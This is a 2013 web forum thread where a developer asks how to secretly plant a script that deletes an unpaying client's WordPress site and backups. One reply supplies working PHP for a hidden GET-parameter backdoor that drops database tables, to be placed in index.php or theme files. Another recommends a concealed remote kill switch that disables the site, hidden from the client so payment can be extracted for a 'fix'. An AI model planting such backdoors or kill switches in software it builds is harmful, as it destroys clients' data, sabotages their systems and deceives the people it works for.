1. Advertising
    y u no do it?

Advertising (learn more)

Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

Starts at just $1 per CPM or $0.10 per CPC.

Recommend me an open source script for this purpose(See Inside)

Discussion in 'Programming' started by mcreative, Aug 6, 2013.

Hi !
    I am working on a wordpress site at the moment and the client plans to pay me at the project completion. So just to be on the safe side, I want to install a script on a hidden directory IN CASE the client for example doesn't pay me and changes his server details. We all know how much scamming is going on these days. So incase that happens I want that I run that script so all the site files that I worked on gets deleted from his server. So he cannot benefit from the work i did.

This is just a precautionary measure I want to take. Please suggest me an open source script for this purpose. Also I want to make sure that his server doesn't have a backup of the files too. so plz suggest me that as well.

Thanks.

mcreative, Aug 6, 2013 IP
  2. marht

marht Active Member

Best Answers:
    Hi mcreative,

I would say build in a if(isset($_GET['mcreative'])) switch.

if(isset($_GET['mcreative'])) {
       if($_GET['mcreative'] == "YOURMD5PASS") {
       global $wpdb;
       $YOURTABLENAME = "Your Table Name, for example wp_users";
       $wpdb->query("DROP TABLE ".$YOURTABLENAME."");
    }
    }

PHP:
    Include this in the index.php or footer.php or header.php or PHP include a file from there.

But I would rather suggest that you just ask your client(s) a 50% in advance.

I hope this helps you!
    Kind Regards,

Maarten

marht, Aug 6, 2013 IP
  3. mcreative

mcreative Active Member

Best Answers:
    hey !
    thanks man. i usually do but this project was a little highly paid then usual so the client also wants to be sure that he doesnt gets scammed.
    thanks for this man :)

mcreative, Aug 6, 2013 IP
  4. marht

marht Active Member

Best Answers:
    No problem mcreative, good luck with the project!

marht, Aug 6, 2013 IP
  5. davetrebas

davetrebas Active Member

Best Answers:
    If I were doing this project, I would be doing the development on a host that I fully control.

Also the client would not have access to the WordPress via logon and password since they could install the Duplicator plugin and download the site.

Once the site was approved and paid for, I would move it to the client site.

Your idea about deleting your clients files is NOT A GOOD IDEA even if he has not paid you for the work. You are leaving yourself open for all kinds of problems.

How far along are you on this project? If you are less than half way done, I would move the site to my own hosting for "security" reasons. Any reason will do. If the client is not intending to "burn" you they should not object.

The other thing. What sort of contract do you have with this client? How enforceable is it?

An easy way to protect yourself is to have some file on another server somewhere that you check for in your clients code. Then add a lot of two line php codes to verify that that file exists. If it does not exist then execute and exit(); statement;

If you don't get paid then delete the file and the clients WordPress site will simply stop running. Of course, don't tell the client you have done this. Just offer to "fix" things once you get paid.

Good Luck

davetrebas, Aug 7, 2013 IP
  6. marht

marht Active Member

Best Answers:
    Althrough I suggested a fix, I also agree with davetrebas. You can use various plugins to copy your client's Wordpress files + database and deploy it on your own server. Ask 50% for the transfer and 50% for the admin account.

marht, Aug 9, 2013 IP